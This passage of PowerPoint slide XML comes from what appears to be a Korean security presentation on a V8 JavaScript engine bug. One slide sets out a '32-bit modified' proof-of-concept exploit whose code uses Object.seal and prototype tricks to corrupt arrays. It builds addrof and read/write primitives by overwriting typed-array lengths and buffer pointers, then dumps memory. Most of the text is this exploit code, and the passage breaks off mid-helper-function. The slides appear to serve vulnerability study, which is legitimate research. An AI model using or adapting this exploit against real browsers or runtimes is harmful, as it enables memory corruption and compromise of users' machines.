            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="날짜 개체 틀 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5EE5EB3-C7E3-4F56-8678-16409675CB8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2DD75A7A-6A6A-4018-8942-093C6F606575}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2826842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962403-B5F4-4A33-9B04-6662D25D9260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6430755"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PoC description modified to work with 32-bit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRP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7" y="866181"/>
            <a:ext cx="11052923" cy="276999"/>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sz="1200"/>
              <a:t>The following code is not executed at once. Running twice will probably succeed. The reason is the padding problem. Padding means memory alignment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406E42C7-0CE3-4640-ADFC-09005E42ECCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434400" y="1143180"/>
            <a:ext cx="3160800" cy="5478423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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function get_rw() {</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let xxx = [];</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const o = {foo: 0x41414141};</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for (let i = 0; i &lt; 15; i++) {</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o[i] = i+16;</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 the first corruption target</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float_array = [0x41414141];</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 = new Uint32Array(2);</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tarr[0] = 0x31313131;</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tarr[1] = 0x32323232;</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tarr2 = new Uint32Array(2);</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tarr2[0] = 0x41414141;</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tarr2[1] = 0x42424242;</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tarr3 = new Uint32Array(2);</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tarr3[0] = 0x43434343;</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tarr3[1] = 0x44444444;</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view = new DataView(tarr3.buffer);</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 object used to imlpement the addrof primitive</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obj_addrof = {'a': 0x31323334/2, 'b': 1};</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obj_addrof['b'] = obj_addrof;</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 build a NumberDictionary inside the FixedArray</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o[0] = 0x08;    // number of elements</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o[1] = 0;       // number of deleted elements</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o[2] = 0x08;    // capacity;</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o[3] = 0x32;    // max key/requires slow elements</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 first element of the NumberDictionary</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o[4] = 0;       // key</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o[5] = 0x4141;  // value</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o[6] = 0xc0;    // PropertyDesc</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[DEBUG][BEFORE][Object.seal(o)]  %DumpObjects(0, 11)");</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Object.seal(o);</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[DEBUG][AFTER][Object.seal(o)]  %DumpObjects(0, 11)");</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const v12 = {foo: 0x42424242};</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[DEBUG][BEFORE][Object.preventExtensions(v12)]  %DumpObjects(0, 11)");</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Object.preventExtensions(v12);</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[DEBUG][AFTER][Object.preventExtensions(v12)] %DumpObjects(0, 11)");</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[DEBUG][BEFORE][Object.seal(v12)] %DumpObjects(0, 11)");</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Object.seal(v12);</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[DEBUG][AFTER][Object.seal(v12)] %DumpObjects(0, 11)");</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const v18 = {foo: Object};</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v12.__proto__ = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endPar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o[0] = 0x4242;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"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delete o[1];</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="직사각형 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57D4B593-7E01-4628-B3A3-53A450B34A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6595200" y="1143180"/>
            <a:ext cx="5215690" cy="5247590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    if (float_array[2] !== undefined) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        this.exploited = true;</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console.log('[+][EXPLOIT_MEMDUMP] ============================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</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float_array[3] = float_array[3].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[4] = float_array[4].setLowUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[15] = float_array[15].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[15] = float_array[15].setLowUint32(0xC8C8n);</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 tarr3.byteLength</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[26] = float_array[26].setHighUint32(0xC8C8n);</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 view.byteLength</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[41] = float_array[41].setHighUint32(0xC8C8n);</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 tarr3.buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        obj_addrof['b'] = tarr3.buffer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+] addrof(45): ' + (float_array[45].float_to_high_32bit() - 1n).toString(16));</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 float_array[31] = float_array[31].setHighUint32((float_array[45].float_to_high_32bit() - 1n + 12n + 28n));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[26] = float_array[26].setHighUint32(0x04040404n);</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console.log('[+][EXPLOIT_MEMDUMP] ============================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</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console.log('[+][VERIFY_RESULT_LENGTH] =======================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr.length: ' + tarr.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr.byteLength: ' + tarr.byteLength);</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console.log('[+][VERIFY_RESULT_LENGTH] -------------------------------------------------------');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr2.length: ' + tarr2.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr2.byteLength: ' + tarr2.byteLength);</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console.log('[+][VERIFY_RESULT_LENGTH] -------------------------------------------------------');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr3.length: ' + tarr3.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr3.byteLength: ' + tarr3.byteLength);</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console.log('[+][VERIFY_RESULT_LENGTH] -------------------------------------------------------');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] view.byteLength: ' + view.byteLength);</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console.log('[+][EXPLOIT_DUMP_BUFFER] ========================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        for (i = 0; i &lt; 60; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            if (i == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_high_byte] float_array[' + (i*2).toString() + ']: ' + float_array[i].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_low__byte] float_array[' + (i*2+1).toString() + ']: ' + float_array[i].float_to_high_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_high_byte] float_array[' + (i*2).toString() + ']: ' + float_array[i].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>                console.log('[+][64bit][32bit_low__byte] float_array[' + (i*2+1).toString() + ']: ' + float_array[i].float_to_high_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        }</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console.log('[+][DEBUG] float_array[81]: ' + float_array[40].float_to_high_32bit().toString(16));</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console.log('[+][EXPLOIT_DUMP_BUFFER] ========================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        for (i = 0; i &lt; 100; i += 4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>            console.log('[+] view.getUint32(' + i + ', true): ' + view.getUint32(i, true).toString(16));</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return true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="500">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="500">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E606085-9C3A-41BB-B648-AD4A9BE97A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="1143180"/>
            <a:ext cx="3053290" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// HELPER FUNCTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let conversion_buffer = new ArrayBuffer(8);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let float_view = new Float64Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let int_view = new BigUint64Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.float_to_high_32bit = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return (int_view[0] &gt;&gt; 32n) &amp; 0xffffffffn;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
